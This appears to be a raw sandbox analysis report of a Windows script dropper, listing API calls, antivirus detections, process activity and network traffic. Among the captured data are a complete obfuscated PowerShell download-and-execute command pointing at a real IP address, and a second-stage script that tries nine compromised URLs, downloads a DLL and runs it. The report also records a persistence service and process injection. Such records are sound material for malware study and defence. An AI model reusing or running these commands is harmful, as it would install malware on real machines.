ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdbd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76da652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x770fc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd7da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 98756672
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 98762624
registers.r11: 98758432
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1925372213
registers.r13: 0
1 0 0
file C:\Users\Public\Documents\ssd.dll
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Cyren VBS/Agent.AIB
Avast SNH:Script [Dropper]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
McAfee-GW-Edition BehavesLike.HTML.ExploitBlacole.lg
Microsoft Trojan:Script/Sabsik.FL.B!ml
Ikarus Trojan.Script
AVG SNH:Script [Dropper]
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 139264
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x01c81000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 19 Jan 2022 02:33:32 GMT Content-Type: image/png Content-Length: 972 Last-Modified: Tue, 18 Jan 2022 14:05:40 GMT Connection: keep-alive ETag: "61e6c934-3cc" Accept-Ranges: bytes
Data received $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'https://soomaal.softuvo.xyz/wp-includes/U7Jmw9DLhYjz/'; $url2 = 'http://ippur.ufrj.br/assets/W8jp7/'; $url3 = 'https://scoute.ai/wp-content/dIg/'; $url4 = 'https://wordpress.pixeleyenow.com/b/X1E8eB/'; $url5 = 'http://sarvaero.com/assets/BRrGH0HSkc/'; $url6 = 'http://atplengineering.com/wp-admin/mDk/'; $url7 = 'http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/'; $url8 = 'https://flatonicstudios.com/57sa4yh7/iOx1jeSrT/'; $url9 = 'http://blomjous.org/wp-admin/1W/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Data received HTTP/1.1 302 Moved Temporarily Server: nginx Date: Wed, 19 Jan 2022 02:33:44 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive Location: https://ippur.ufrj.br/assets/W8jp7/ <html> <head><title>302 Found</title></head> <body> <center><h1>302 Found</h1></center> <hr><center>nginx</center> </body> </html>
Data sent GET /ve/ve.png HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
Data sent GET /assets/W8jp7/ HTTP/1.1 Host: ippur.ufrj.br Connection: Keep-Alive
Data sent GET /assets/BRrGH0HSkc/ HTTP/1.1 Host: sarvaero.com Connection: Keep-Alive
Data sent GET /wp-admin/mDk/ HTTP/1.1 Host: atplengineering.com Connection: Keep-Alive
Data sent GET /-/gkUMZLMfkddmFdMlJ/ HTTP/1.1 Host: www2.s12.xrea.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2336 CREDAT:145409
service_name mwvuijgsfryxorv.pgq service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 2
password:
display_name: mwvuijgsfryxorv.pgq
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
service_name: mwvuijgsfryxorv.pgq
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
desired_access: 2
service_handle: 0x00570468
error_control: 0
service_type: 16
service_manager_handle: 0x00570328
1 5702760 0
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

send

buffer: GET /ve/ve.png HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
socket: 1196
sent: 70
1 70 0

send

buffer: vraçx(ZBlŒŸ´£”Í´hLK¤Äwv§ÔÖ%r /5 ÀÀÀ À 281ÿsoomaal.softuvo.xyz  
socket: 1220
sent: 123
1 123 0

send

buffer: FBAYxX 6ÿ6R@;Gró“e kä_+õ¶Þ-d@̘"êìS{؛BSȽ!ál@‚ÌÅvÑ­®—}›drî4‚l0€ƒ®4î®cÑõ!]MQ—ý¶æëÿ¡ ’çûèT8xÍ [º¯~ c¨úÎA
socket: 1220
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

buffer: GET /assets/W8jp7/ HTTP/1.1 Host: ippur.ufrj.br Connection: Keep-Alive
socket: 1764
sent: 76
1 76 0

send

buffer: plaçx2-=EñC€Ý¯‡A剏»¼‡2êR ú¥Î/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
socket: 1796
sent: 117
1 117 0

send

buffer: plaçx3Dq|C ö>l1O9Öf×iø×6ÝÆ¼¯¾/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
socket: 1796
sent: 117
1 117 0

send

buffer: lhaçx4KšwÀu+‹›PÜwÃdÈ¢ÿ—™>ë̆¸pú²/5 ÀÀÀ À 28'ÿ scoute.ai  
socket: 1796
sent: 113
1 113 0

send

buffer: FBA󆖮劤u½÷*5B• ÷L¯šÆW­fZx/ðKšL·®(îÑÝ4ì¸L5= Û´ëj¥J’ÑoébÑRÇ}0ÂAÊñÞoÏorÔ3~ªÁFþî¡<¤ZšˆåLegD„’ÁÖ'¬IVÃ3m]
socket: 1796
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

buffer: |xaçx4,+ðÐ \ø«ž±ÎûÃjã¬n€s44‰Ãöa/5 ÀÀÀ À 287ÿwordpress.pixeleyenow.com  
socket: 1796
sent: 129
1 129 0

send

buffer: 0í¹ôtIÜ$öK>³"4 mÁ”\N y¼½$£L”Rë †Âr˜­^mo,Ž0ËH$¢|¸JÙÄ´½°H`\¼8Žß¤Š”dåág¤ÄY«ëzSnfMÔÑæèJìpŠÒ&)»˜iÒ¨ªŽ4 ªÕVDÁpF0%9Õaµ"ì~×àrý**z†ùN§šê”ß*&šýóNä,p‚B°qGë¤çHƒ92>˜oÙ¼9§  ÷<Ê9Ì>ªi6lôfǘ¼%=LJv[¶C?¿-`)1ô¸ûßvp·vQ6›|sÊr˜AVØu3cT¸É8â’“þÛ¦·áùMH¨³Û]0ë‹o®‚×:R“Gæõç"Fx÷ОYÄgìŸ onû^®ô„ï6áî<>D\c¸
socket: 1796
sent: 326
1 326 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

buffer: GET /assets/BRrGH0HSkc/ HTTP/1.1 Host: sarvaero.com Connection: Keep-Alive
socket: 1796
sent: 80
1 80 0

send

buffer: GET /wp-admin/mDk/ HTTP/1.1 Host: atplengineering.com Connection: Keep-Alive
socket: 472
sent: 82
1 82 0

send

buffer: GET /-/gkUMZLMfkddmFdMlJ/ HTTP/1.1 Host: www2.s12.xrea.com Connection: Keep-Alive
socket: 480
sent: 87
1 87 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq:Zone.Identifier
Process injection Process 2336 resumed a thread in remote process 2456
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000368
suspend_count: 1
process_identifier: 2456
1 0 0
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe